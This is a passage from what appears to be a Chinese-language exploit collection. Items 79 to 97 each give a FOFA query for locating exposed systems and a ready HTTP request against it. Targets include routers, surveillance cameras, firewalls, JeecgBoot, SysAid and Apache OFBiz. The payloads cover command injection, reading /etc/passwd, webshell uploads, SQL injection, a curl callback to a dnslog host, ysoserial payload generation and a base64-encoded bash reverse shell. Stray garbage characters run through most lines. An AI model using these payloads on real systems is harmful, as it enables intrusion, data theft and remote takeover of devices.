1 n( E7 E! r7 }+ s: l" v------YsOxWxSvj1KyZow1PTsh98fdu6l
1 f  F  x  E9 V! A# ^Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
  X5 J" [; ^  S+ A- }Content-Type: image/png$ K3 x& r3 C( E6 s( V, a  M$ [: \; p8 J

. t6 d9 n0 a- P/ l4 FYsOxWxSvj1KyZow1PTsh98fdu6l
/ G5 Y' u3 ~( q2 d9 \! Y# e8 ~------YsOxWxSvj1KyZow1PTsh98fdu6l
; v6 d/ f5 o0 U6 N% }" ~  m/ bContent-Disposition: form-data; name="target"
% `( e* |" H% |! j: h2 F9 x6 j
/Applications/SkillDevelopAndEHS/. \4 r6 p2 w7 W. p' j/ u
------YsOxWxSvj1KyZow1PTsh98fdu6l--
3 E. d6 R) p6 w7 @: z- e6 f. o  T) R4 a5 D  S; V& j, G
: i. Z2 |3 T1 A# }; |7 n
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1" @$ h0 g6 q5 P6 j
Host: x.x.x.x
6 A: h1 u& [3 r/ I5 N+ C5 P: K. O6 E+ r6 w

3 |5 Q2 p) _1 r+ S9 O3 ]" `2 B/ u79. BYTEVALUE 百为流控路由器远程命令执行
8 ?( `  j  `! |8 {/ Z1 c/ CFOFA:BYTEVALUE 智能流控路由器: U0 f8 P0 U7 a: p
GET /goform/webRead/open/?path=|id HTTP/1.1% E- {% p$ c5 K7 y9 e
Host:IP
7 G; H: E4 f% w! {1 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
# _: q7 t# s/ tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ u  F9 f9 ?" [7 B5 n
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' y  p: ?, }7 H  b0 h$ i; u+ vAccept-Encoding: gzip, deflate. S* j0 ?; \9 m9 {  U- J
Connection: close0 T& U5 S* |4 p1 [
Upgrade-Insecure-Requests: 1
" z7 J" ]4 l, {2 A& s; U
. L1 Y$ R  f/ C! @8 o8 E9 p6 I; _! `" m# o6 ]
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传5 R! Z0 f5 m* ?
FOFA:app="速达软件-公司产品"
& K! P: r9 L4 |8 sPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.16 ~. F6 R2 i" V
Host: x.x.x.x
; s/ X; t- s+ d, a/ IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 A3 z3 |' n' a# |9 v6 zContent-Length: 27( V& c' t* w/ ~4 U* l) Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 z3 B! L! ~3 u) u  S5 h4 d
Accept-Encoding: gzip, deflate$ K8 e# P+ G+ S8 o2 z( M: T9 z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% U; Z9 N) [: _. O) {& M
Connection: close7 j! {7 J0 l& l3 V
Content-Type: application/octet-stream# }8 s) D/ S0 b2 X2 t4 j* @& }0 \
Upgrade-Insecure-Requests: 1
2 I% T$ x9 v+ L! W3 o) C- ~. ^" |8 r6 }7 k- m
<% out.print("oessqeonylzaf");%>
! x4 \. i* S7 h( k/ n; L8 N
% i% B. g1 y% ?. Q6 E" ?! f6 R  {0 P# B( L
GET /xykqmfxpoas.jsp HTTP/1.1
: a* r4 d. T- Y! yHost: x.x.x.x* e# D9 A0 ?, s, g+ E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" K' u; |, I0 \
Connection: close
5 \4 Q( \4 }$ b& C: fAccept-Encoding: gzip3 W3 n! l( U) m- o* t, f5 W

3 ^: A- _8 s9 D3 m1 I; b) c( m- Z! g. Z1 o6 T
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露& L( K2 n' u3 b/ N" K1 F! x
FOFA:app="uniview-视频监控"
4 o# l  H; g5 S1 d; {GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1: s% Y$ x' g" v# K/ R, }9 ?, a6 Q
Host: x.x.x.x& }( }* h9 T8 V! `; u2 D' j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; C0 K$ A6 p4 H: l  d# p4 `; A
Connection: close
( \3 M) l- K" s% }Accept-Encoding: gzip9 F& C5 _9 c  N0 L+ q% O
+ \6 e$ R" |2 U8 @! c$ n7 U
4 |; p* z$ l; J$ y
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行% V  L0 B# l0 ?% L6 b3 }. B8 {
FOFA:app="思福迪-LOGBASE"
# M. s. @4 X2 X& [POST /bhost/test_qrcode_b HTTP/1.1$ H0 C& f- X+ C5 X' Z; A
Host: BaseURL; {8 k" q1 |/ \  W% o# Z5 o
User-Agent: Go-http-client/1.1
8 Q/ u5 O1 r0 UContent-Length: 237 R# H! `4 ^) x) H+ P- `
Accept-Encoding: gzip
2 t9 i9 g2 x: J; o& F. |% k% eConnection: close
) n% R+ u1 d7 c- W. P5 \3 D/ j4 h; QContent-Type: application/x-www-form-urlencoded" u5 d" E& g' f, ~) ^+ A/ t
Referer: BaseURL
! B! I. O/ D4 W+ g
; ]: m6 G8 F" I1 ?/ G- s- S" y6 y  rz1=1&z2="|id;"&z3=bhost
; \0 Z: b. I2 F) e  @% ]3 ~  I, B/ d7 U8 D% J' s
& H1 |0 R7 D" |: W2 y6 @; {; g
83. JeecgBoot testConnection 远程命令执行
0 ]9 f; e' c5 O3 _: D% U# r/ b) _FOFA:title=="JeecgBoot 企业级低代码平台"
* b$ [$ ]% ^9 @4 D8 o0 f
9 Q. d! t! j8 V" l2 {6 ]( k6 g8 S* s- z0 C4 I' m3 K7 ?5 V
POST /jmreport/testConnection HTTP/1.1) a! W. J+ n* |+ q8 m- h
Host: x.x.x.x$ j2 B/ v& Y+ r4 L% ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 c( }: Q# f4 m4 l+ x6 i9 K4 r
Connection: close
; [* K7 R& n' R. \) fContent-Length: 8881
2 S% z/ w) M! \% u9 U8 t: A; S# UAccept-Encoding: gzip
6 j) U1 Y# _. [$ d5 jCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
6 G: G- z# G8 H6 [Content-Type: application/json
/ f" G* u$ H0 y0 Q. t( Q
+ _# G6 d/ Q% @& QPAYLOAD+ B  M# Q7 B- n; E

& l! W+ _$ ~7 M+ r% y" s84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
# I: l5 h* m: v8 S0 p& GFOFA:title=="JeecgBoot 企业级低代码平台"
5 w/ b. `8 ~6 v" f
' `; {% p* h) [5 B" |( T! N
/ b7 r: a6 M* S7 E1 i2 D
, T9 }5 _' R% WPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
, V) e  o0 @  I. l$ S& a+ {Host: 192.168.40.130:8080
) P6 _5 n: B/ e7 Z* U4 hUser-Agent: curl/7.88.1$ F- w% }$ W3 Q9 E8 s! ~
Content-Length: 156
/ k+ e: c. t  r+ A% C# @) ?) PAccept: */*
5 K$ k4 B& A' a6 H+ ~  N3 p7 jConnection: close
# a0 P5 _1 p  e3 I5 hContent-Type: application/json
1 C2 O0 s' e8 J  aAccept-Encoding: gzip4 V% m! w: b1 W; u: a4 ?

/ B8 R* t' Y; F9 |{5 c" F( y% d& ?7 N- \: A" d
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
) _9 I9 S+ b) Q; N7 y, w, T  "type": "0"
1 }/ t& T% p. f. m9 p}
. |' ~/ X( R5 S; J6 w# K: w! r7 i/ A- i7 Y9 B
- B$ \8 q6 F; M% h* c
85. SysAid On-premise< 23.3.36远程代码执行
' a7 k1 L* G8 F* V0 h  h5 G' SCVE-2023-47246
, n2 J7 A/ ?9 uFOFA:body="sysaid-logo-dark-green.png" 3 b$ K) Z2 `; C; l" t
EXP数据包如下,注入哥斯拉马% k) T! B* H- |3 |! G, o
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.10 ~8 A) o$ L/ O" b# g
Host: x.x.x.x7 \% e0 _- S# f+ ^6 p" S, U* T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& g" K$ H! A2 U8 f) J. j8 {
Content-Type: application/octet-stream
* ?- R+ R2 @( T0 \/ H+ L) fAccept-Encoding: gzip" L% f. t9 S& X. ?! M5 s

9 k% g- O4 _; M; A: I+ MPAYLOAD
3 A0 G% Z7 ?0 ?( W& @4 y3 T  N* o! g$ V9 m) p, [- I! x/ n
回显URL:http://x.x.x.x/userfiles/index.jsp) |# m1 K" P. K( q

& w, k9 X, i7 ~4 Y$ K4 L5 A5 H86. 日本tosei自助洗衣机RCE- g/ O7 }3 e1 m! h, U+ f6 X- W
FOFA:body="tosei_login_check.php"5 p$ ^7 D7 r5 ]5 W! [
POST /cgi-bin/network_test.php HTTP/1.1
6 v4 b# o6 l& B# r# m: Y) cHost: x.x.x.x
% C. B7 `7 W" N5 Q1 LUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
! E2 _6 t' N1 ~! vConnection: close
6 C2 l# X* G$ I- E9 G3 i- f$ j5 `Content-Length: 441 [2 v) f. M! |% j6 g
Accept: */*
& |4 K* o) A+ |. J2 G: GAccept-Encoding: gzip- }# L; G$ e* s
Accept-Language: en
( f% D) l. I, |1 X6 fContent-Type: application/x-www-form-urlencoded
3 Z  m% G; u& J. ~1 b! t; [0 c8 I* a) S$ }/ Z$ l- g5 F
host=%0acat${IFS}/etc/passwd%0a&command=ping& U# Z, ~7 H5 o. [
$ y3 I6 z. A6 Y# g8 u( c, p( \, N& o

% C* z; J: V( s+ Y7 h& n. v2 A87. 安恒明御安全网关aaa_local_web_preview文件上传- |$ h+ \; W, Z
FOFA:title="明御安全网关"# ?5 S: k' \3 d% l. ?
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1  W3 j2 H  N9 g) ^$ {9 e% F
Host: X.X.X.X- ^$ o# i% `8 z: q- }2 E! q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 T  e2 L9 \9 Y' h& m  tConnection: close
4 u. i9 R& t+ A' K" A5 iContent-Length: 198$ k* M6 ~+ ~2 i0 P3 e
Accept-Encoding: gzip
# w0 S# s: d8 ^' H# Q& QContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd  u4 A' ?* G" x( o# r

$ x6 z) v: k1 W/ O0 `% J--qqobiandqgawlxodfiisporjwravxtvd
# |' V; }, H5 X1 k  lContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
$ Y" g: U9 y& q. p* {7 i" l/ \Content-Type: text/plain
/ U. ?" Z2 i9 y; i0 L" p2 ]1 a* m3 V: e6 `: K
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
: Z  k) N! g7 I) M) ^& O--qqobiandqgawlxodfiisporjwravxtvd--
7 [) `+ W4 I! _) I! L) r9 {. h2 S

3 }$ Y, d( m6 b) p8 E0 g& P/jfhatuwe.php+ q7 K. n# d5 s4 V: u( j( `  g$ P9 s

' O8 p7 t/ X% M+ T" S5 _88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行3 e! M; W4 p' b2 W1 r
FOFA:title="明御安全网关"8 j3 w! t! t1 i; ?) D9 w( b% m. L( [
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
/ m/ B3 D* Q8 a' c* THost: x.x.x.xx.x.x.x
: G9 |" L; v3 j6 R* fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 n& Z; |7 {% P* W* [; J# [2 L* ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& {. C: M  o8 m7 ~" u0 \7 }Accept-Encoding: gzip, deflate% v5 S1 a' |  |) H# C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 b9 G; C6 I( b- v0 n! \: uConnection: close/ R. ~8 l; p3 `. f; g9 E
1 ~' r4 y* ]# [( i% D2 `
5 ~0 V# R3 @8 K$ y
/astdfkhl.php
8 |" v) h# b9 _# N! g
3 ^1 \% ]" p4 l0 Q0 t0 Q89. 致远互联FE协作办公平台editflow_manager存在sql注入+ U8 J, M0 l- i7 U9 N( @$ r/ W2 W
FOFA:title="FE协作办公平台" || body="li_plugins_download"
  R5 O! c5 g" y  APOST /sysform/003/editflow_manager.js%70 HTTP/1.1
5 l7 c9 ~6 U! K7 @Host: x.x.x.x
! d7 d7 X1 Y& N: F" H% x, tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 U; L4 Q1 R3 ], P+ }
Connection: close
1 y' W& f/ @3 w9 RContent-Length: 41
) W7 |' c$ v, N7 vContent-Type: application/x-www-form-urlencoded- b( H4 j& b9 \2 u" t
Accept-Encoding: gzip
9 k# {3 g5 T- T) ]  H& g' v" z4 f  C3 q$ ?
option=2&GUID=-1'+union+select+111*222--+& T, L8 ]" V2 G# w! |! C
" m" ^' d# y4 L- ?5 a! B" z" T4 ~
% ?, r8 ]; F( `4 C7 W4 H
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行7 r% b- z$ F- C
FOFA:icon_hash="-1830859634"
/ v, q( a$ d% u  P8 |; S/ sPOST /php/ping.php HTTP/1.1
" v/ @% t7 T, x7 Q. SHost: x.x.x.x
) P0 H  k4 v( t% _. K/ ]! KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
9 a8 L9 X; e. C- x1 q5 |Content-Length: 51# {/ c9 T2 t: m0 h5 O5 b
Accept: application/json, text/javascript, */*; q=0.01
2 D: V: _# P( x/ hAccept-Encoding: gzip, deflate
2 b& a$ c7 ?  B3 L# ?1 ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 @. z; E* r$ }  }5 P+ rConnection: close
3 p& B# F0 ]# oContent-Type: application/x-www-form-urlencoded6 _& \: l9 p1 `* d
X-Requested-With: XMLHttpRequest# f6 q" I6 A, b% J  g, J3 f: A; J3 L

; C. u, G7 S7 Wjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig3 x1 o5 A) X9 D4 C

8 L3 M3 Q2 u* P- b4 b& Y! T2 W+ w: e) P4 `
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
# E* W. e* I! [% }0 C( g( {" [FOFA:title="综合安防管理平台"
' J6 S& a4 \- }0 sGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
6 `2 x' X* N$ j! R. `9 O1 k! eHost: your-ip5 V7 c" I5 ]+ q% s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36/ q  g) Z% n+ O# {' i/ C
Accept-Encoding: gzip, deflate/ b8 i! G/ t; n! l/ @: V$ w+ f
Accept: */*" S1 y$ g7 E6 }2 Y* \# b: P
Connection: keep-alive
+ X& H1 l: d% e* ^1 ^; i( }+ B; B* Q* N, c) ^1 P% m5 K

2 P9 O! d( v3 H( k$ `  F6 q1 {. H- @: U) Y$ N
92. 海康威视运行管理中心session命令执行
, v: a, [& @8 jFastjson命令执行8 [& J9 e+ c. k1 r0 H& i% {
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
2 J7 {( e) ?" b" [* @* pPOST /center/api/session HTTP/1.1) `" C1 k6 R" Q2 b- m
Host:
: o: z# m1 t  H2 ]% S$ R1 KAccept: application/json, text/plain, */*
+ O7 D: O3 _8 O% {* Q8 S8 s- rAccept-Encoding: gzip, deflate. m4 i. f' O% q5 h9 a
X-Requested-With: XMLHttpRequest
) r1 t: ~  Z  nContent-Type: application/json;charset=UTF-8
7 n. X( }8 K& ^X-Language-Type: zh_CN, y& Z: H/ e) I6 y3 e
Testcmd: echo test4 I7 G5 g+ p4 x9 p/ n) c7 d# i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36, C4 k9 G: j: ~# A* @
Accept-Language: zh-CN,zh;q=0.9' A1 b* |2 L6 \1 v6 d1 k% x
Content-Length: 5778
8 W7 C& r, `0 t  Y* W1 f5 L+ ]
3 o+ R/ Z5 j" e) J9 W8 cPAYLOAD
3 B' Z5 U% v8 I% L' A$ i9 {4 P" |

+ y% O- m0 d9 U" u. H! @; l93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
) z% Z6 C( D5 n; kFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="$ A; m: f& p$ U( @
POST /?g=app_av_import_save HTTP/1.19 Z/ L8 T& R. S7 Y, r/ |
Host: x.x.x.x
% k( E" n* `$ C1 v2 W9 V( ?2 jContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx! A# l8 X2 a# v' f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ n3 P: o7 U0 [/ ~5 u2 X; j6 `$ b+ |
------WebKitFormBoundarykcbkgdfx0 f  T9 t1 _! h& X
Content-Disposition: form-data; name="MAX_FILE_SIZE"
% _* m! N$ _: R( {# B4 R9 ~8 n! a  A8 _1 t. z) m0 o, W* b% A
100000002 T7 u- c/ R) }1 m3 d3 c
------WebKitFormBoundarykcbkgdfx  ]6 P" W# a9 R0 V4 a$ P
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"/ H% }0 z9 ?6 {: R+ x# S
Content-Type: text/plain  y# F, t) v) p, \" P* `

' t% E2 h. d! l$ k8 W+ v; z9 awagletqrkwrddkthtulxsqrphulnknxa& p4 }( t9 B5 q' S
------WebKitFormBoundarykcbkgdfx) D: N6 d- a0 r, @3 N" ?
Content-Disposition: form-data; name="submit_post"" k6 F; }4 m' x# J+ l) ?" b
/ j$ g; X! S' M( \- k
obj_app_upfile% [9 C" B2 ?9 M5 D2 ~. \, K6 Y# e
------WebKitFormBoundarykcbkgdfx$ E8 q# U% f" K3 t) ?
Content-Disposition: form-data; name="__hash__"
4 \# o$ A9 |! \
3 y1 U4 ]4 P* j7 z0b9d6b1ab7479ab69d9f71b05e0e9445
) ]& S" m4 ~/ ^2 Q8 q: e. q------WebKitFormBoundarykcbkgdfx--
/ E( ^/ O) t: }, e# B
6 y/ i4 E/ _" R" n* w- F( I
; u6 U! ^0 K: O+ j2 d! g" FGET /attachements/xlskxknxa.txt HTTP/1.1' }, H; S6 y3 ]" E, n* q
Host: xx.xx.xx.xx
4 ]! V. M. `" wUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36  a; r7 Q  \  v7 H9 ^/ Z/ f: Z/ G

! k/ y# ], _" u8 A. Z2 w1 l
$ M+ b0 H: ^0 Y, P) x; [# S94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传( c! H5 q0 L5 y+ ^: p# U
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="( l: ^2 q5 O0 @. e! H. ?% G
POST /?g=obj_area_import_save HTTP/1.1
- p' }- V/ C9 @* C& D$ ^0 \Host: x.x.x.x; `( C" y9 ^1 ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt5 S/ ~4 N  A0 q" Z0 M; `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
' V' |- |  a7 j1 b4 K2 Q! X2 e7 k6 a5 j
------WebKitFormBoundarybqvzqvmt7 d. z7 @2 l& n5 Y3 k# A" K
Content-Disposition: form-data; name="MAX_FILE_SIZE"' `4 N- O0 M: l( y: \

: W; F- H" R' D10000000
, W$ x5 M! ?5 Q------WebKitFormBoundarybqvzqvmt" N3 [- w! K. Y+ }
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
7 X/ q2 @& `7 u" W, u7 mContent-Type: text/plain2 p- g4 {$ p* I( c5 d. k. Z, }
- ?( E2 @" c, w+ f, k1 M6 J0 V
pxplitttsrjnyoafavcajwkvhxindhmu3 R5 X1 O" @# c+ i' ^' k
------WebKitFormBoundarybqvzqvmt
- [7 @& X7 h& K: d5 O0 ?$ MContent-Disposition: form-data; name="submit_post"
  `1 `( R% M! r+ l2 |0 y/ g& E/ [+ y+ W1 J$ z& k( H
obj_app_upfile
. q2 g# Q% ^+ R------WebKitFormBoundarybqvzqvmt0 D6 N7 G; q0 d
Content-Disposition: form-data; name="__hash__"
+ h- g1 S4 V, X7 |8 w: v# k2 O7 m7 x+ ^' h; K1 \, |* _7 q# q
0b9d6b1ab7479ab69d9f71b05e0e9445% ^, C% u) J+ Z, ~) K' Y  k
------WebKitFormBoundarybqvzqvmt--7 r+ H. j/ B$ t# y9 d% q, M

+ @4 P! F7 H3 G* z7 ?% H+ {. n0 M9 F  c. ?, S- p1 m

+ v4 H" L& A0 ~7 e. A( BGET /attachements/xlskxknxa.txt HTTP/1.10 o/ r+ }2 J7 q: Z: }
Host: xx.xx.xx.xx
$ d+ v, u. u6 a+ r/ cUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* W. a" v. J& V7 _7 ~
, S1 f4 U' g6 M2 \7 q/ D

( s+ b1 u  ]% D" q1 i
+ z" S" H8 d+ {. @$ T95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行8 E$ s) g/ S' e
CVE-2023-490702 L( z: ?/ C4 S" [4 h7 n
FOFA:app="Apache_OFBiz"
: M/ x! h) ~% [4 P9 Z- d/ z" K: WPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.10 T0 T, A1 L" L% Y5 O( y. \2 f
Host: x.x.x.x9 @0 g7 q0 Z  A* K2 a  }, o- W2 U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
" N+ m! |9 k, P# GConnection: close
- X) G! o& R% p. oContent-Length: 889* y- {! m4 R$ ?9 a  ]8 O7 D: Y
Content-Type: application/xml4 C% |7 n. w# z- c* ^7 N
Accept-Encoding: gzip  b5 q- }5 D7 v( B% d- g) S" |

. D8 [. I$ \( p8 e3 e$ r; K6 C& G<?xml version="1.0"?>
  f; B. k4 S. @9 r<methodCall>: w9 Y2 h5 a6 j) b1 T* F& z
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
9 a& E5 e* K* U) T    <params>
$ t$ \, |" o5 W/ F      <param>* K3 `1 ~4 o; b& }* r' G: E! i
      <value>8 b3 h% v1 x7 S% ^9 b$ M1 C
        <struct>8 r( l( a  N8 N/ s- d
       <member>( u( V- N; M! o+ _1 r9 W# T
          <name>test</name>) J) [7 J8 `2 c+ I/ O9 d
          <value>4 G  g# _4 ^9 C
      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
5 w9 J0 e/ D  x' A6 o, N+ v; d6 l+ l          </value>
# b9 j1 X8 H6 G        </member>6 r8 E- J, Q5 ?* h" Q5 G
      </struct>
& o" z& H$ j! K5 v      </value>
/ \' z6 {/ r1 F* r/ e$ V    </param>: R( i* V7 X! @4 m, d# m8 e
    </params>
1 J2 z0 w0 _" a! I6 g# p0 j5 N& t</methodCall>
; e+ Z8 I: c& e5 M: o$ X0 K0 N0 }( {+ H) e/ E* \# `; x' ]0 ?8 v
" q4 B7 }2 Z. R( ]5 `
用ysoserial生成payload
8 N. _2 ?" j# Q0 d1 m7 Q% jjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
  G, X1 d' H: R; @, ~" R( e
6 y) i6 k- h9 a5 j8 Y& _4 B
8 P6 U5 _  d' O! a  K1 a将生成的payload替换到上面的POC9 q1 H! P$ A+ ~) d, f: D
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
- ^* u% J; l4 F! w' yHost: 192.168.40.130:8443
$ x& d+ Y7 ^' j7 ^' NUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
2 ^. Z( W6 l6 W( M" e% OConnection: close- c$ J( {, ^/ u4 e7 k6 b7 R  @
Content-Length: 889
3 N1 U, k; n' I( {) G* m  OContent-Type: application/xml
9 [  r4 o( v5 _$ A7 z4 iAccept-Encoding: gzip% F  C& K: C' D9 S# g: u, o# M

0 C2 B1 O' A! D- E( {% {% l  C8 rPAYLOAD
8 C) T# H. C6 e# u% N: d$ z! s) i$ ?1 j3 \' n
96. Apache OFBiz  18.12.11 groovy 远程代码执行
2 J* x! U5 ^6 GFOFA:app="Apache_OFBiz"
; o( n1 r) X; }' TPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
5 _2 \3 J9 e) k; D% aHost: localhost:8443+ i/ E5 O# g; M+ A0 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! f5 \6 F% u- g& f
Accept: */*
2 f6 d# S) c+ W* W  pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 k' K+ u8 Y4 I* S
Content-Type: application/x-www-form-urlencoded
5 \: Z+ k- v: j/ |2 S) yContent-Length: 55
: m, Z" r5 u# M3 A! q" `. W2 _  V3 b- z1 u% \
groovyProgram=throw+new+Exception('id'.execute().text);
' q1 x9 }  k) V4 |4 s4 X: @2 g1 }
: ^" S. Q/ ^2 y# |" @/ [( {
反弹shell
. x0 s" T$ T, w3 }" n: `) o  V0 m在kali上启动一个监听
) @; |0 Z4 D' tnc -lvp 7777
1 w( `; V# S, I2 U  q, H! W1 ?
) \6 R7 D7 t1 E7 U8 qPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
' p9 w  I! k* c* `5 Q( P# pHost: 192.168.40.130:8443
7 o0 F! K9 n: i$ i( Q) iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
! _- [# q6 s* jAccept: */*6 a$ \/ t4 }" C: H0 g" L/ w5 z+ `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ _2 {! r8 k8 `6 f" o- k% CContent-Type: application/x-www-form-urlencoded
' X3 P* n6 ^6 O8 u6 D) ]Content-Length: 71- l- p6 ]+ p( |# Q3 }8 [0 N

& I" I/ u; s! z! B7 p0 fgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
! o2 `5 J. ]5 |+ A6 D
& \, n% c, T/ L% F97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行2 t! o9 X6 j9 Q$ b6 `1 u2 A# L+ M
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"' T9 u0 h2 c( v* ]/ s
GET /passport/login/ HTTP/1.15 S3 [$ b2 z9 z0 f: M
Host: 192.168.40.130:8085+ b! l2 K/ C) G6 k* M0 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 M& A4 q+ p2 O& D; T& Z
Accept-Encoding: gzip
) F: b1 T/ Q- X4 p" l7 H4 @Connection: close
! C" V5 Z& W2 K7 w$ ]5 j; ZCookie: rememberMe=PAYLOAD
